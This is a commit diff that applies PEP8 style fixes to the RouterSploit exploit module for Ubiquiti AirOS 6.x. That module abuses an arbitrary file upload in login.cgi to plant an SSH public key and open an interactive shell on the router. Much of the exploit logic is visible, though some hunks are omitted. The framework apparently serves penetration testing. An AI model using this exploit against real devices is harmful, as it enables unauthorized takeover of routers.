Fixing PEP8 violation.

b2736557 · fwkz · c973abf4 · b2736557
Commit b2736557 authored May 11, 2016 by fwkz
Hide whitespace changes
Inline Side-by-side

Showing with 36 additions and 33 deletions

airos_6_x.py routersploit/modules/exploits/ubiquiti/airos_6_x.py +36 -33

No files found.
--- a/routersploit/modules/exploits/ubiquiti/airos_6_x.py
+++ b/routersploit/modules/exploits/ubiquiti/airos_6_x.py
-import requests, tempfile, os.path
+import tempfile
-import paramiko, StringIO, termios, tty, sys, select, socket
+import StringIO
+import termios
+import tty
+import sys
+import select
+import socket
+import requests
+import paramiko
 from routersploit import (
    exploits,
    print_success,
    print_error,
-    print_info,
    random_text,
    sanitize_url,
    http_request,
    mute,
 )
 class Exploit(exploits.Exploit):
-    '''
+    """
    Exploit implementation for AirOS 6.x - Arbitrary File Upload.
    If the target is vulnerable is possible to take full control of the router
-    '''
+    """
    __info__ = {
        'name': 'AirOS 6.x - Arbitrary File Upload',
-        'description': 'Exploit implementation for AirOS 6.x - Arbitrary File Upload. If the target is vulnerable is possible to take full control of the router',
+        'description': 'Exploit implementation for AirOS 6.x - Arbitrary File Upload. '
+                       'If the target is vulnerable is possible to take full control of the router',
        'authors': [
-            '93c08539', #Vulnerability discovery
+            '93c08539',  # Vulnerability discovery
-            'Vinicius Henrique Marangoni' #routersploit module
+            'Vinicius Henrique Marangoni'  # routersploit module
        ],
        'references': [
            'https://hackerone.com/reports/73480',
            'https://www.exploit-db.com/exploits/39701/'
        ],
        'devices': [
            'AirOS 6.x'
        ]
    }
-    target = exploits.Option('', 'Target address e.g. https://192.168.1.1') #Target address
+    target = exploits.Option('', 'Target address e.g. https://192.168.1.1')  # Target address
-    port = exploits.Option(443, 'Target port e.g. 443') #Default port
+    port = exploits.Option(443, 'Target port e.g. 443')  # Default port
-    #Disable certificate verification warnings
+    # Disable certificate verification warnings
    requests.packages.urllib3.disable_warnings()
    def run(self):
-        if(self.check()):
+        if self.check():
            print_success('Target is vulnerable')
            print_success('Trying to exploit by uploading SSH public key')
@@ -61,7 +68,7 @@ class Exploit(exploits.Exploit):
            upload_url = sanitize_url('{0}:{1}/login.cgi' .format(self.target, self.port))
            response = http_request(url=upload_url, method='POST', files=upload_params)
-            if(response is None):
+            if response is None:
                print_error('Something was wrong while uploading the SSH Public Key')
                return
@@ -90,13 +97,13 @@ class Exploit(exploits.Exploit):
                tty.setcbreak(sys.stdin.fileno())
                chan.settimeout(0.0)
-                while(True):
+                while True:
                    r, w, e = select.select([chan, sys.stdin], [], [])
-                    if(chan in r):
+                    if chan in r:
                        try:
                            x = unicode(chan.recv(1024))
-                            if(len(x) == 0):
+                            if len(x) == 0:
                                sys.stdout.write('\r\nExiting...\r\n')
                                break
@@ -106,14 +113,11 @@ class Exploit(exploits.Exploit):
                        except socket.timeout:
                            pass
-                    if(sys.stdin in r):
+                    if sys.stdin in r:
                        x = sys.stdin.read(1)
+                        if len(x) == 0:
-                        if(len(x) == 0):
                            break
                        chan.send(x)
            finally:
                termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)
                private_key.close()
@@ -123,13 +127,13 @@ class Exploit(exploits.Exploit):
    @mute
    def check(self):
-        base_url = sanitize_url('{0}:{1}/' .format(self.target, self.port))
+        base_url = sanitize_url('{}:{}/' .format(self.target, self.port))
        upload_url = base_url + 'login.cgi'
        response = http_request(url=upload_url, method='GET')
-        if(response is None):
+        if response is None:
-            return False #Target not vulnerable
+            return False  # Target not vulnerable
        rand_str = random_text(length=16)
@@ -143,14 +147,14 @@ class Exploit(exploits.Exploit):
        tmp_payload.close()
-        if(response is None):
+        if response is None:
-            return False #Target not vulnerable
+            return False  # Target not vulnerable
-        #Response to verify if the upload was done correctly
+        # Response to verify if the upload was done correctly
        airview_url = base_url + 'airview.uavr'
        verify_upload = http_request(url=airview_url, method='GET')
-        #Upload empty file to "clear" the airview.uavr file
+        # Upload empty file to "clear" the airview.uavr file
        clean_tmp_file = tempfile.TemporaryFile()
        clean_tmp_file.seek(0)
@@ -159,8 +163,7 @@ class Exploit(exploits.Exploit):
        http_request(url=upload_url, method='POST', files=upload_params)
        clean_tmp_file.close()
-        if('vulnerable'+rand_str in verify_upload.text):
+        if "".join(('vulnerable', rand_str)) in verify_upload.text:
            return True
        else:
            return False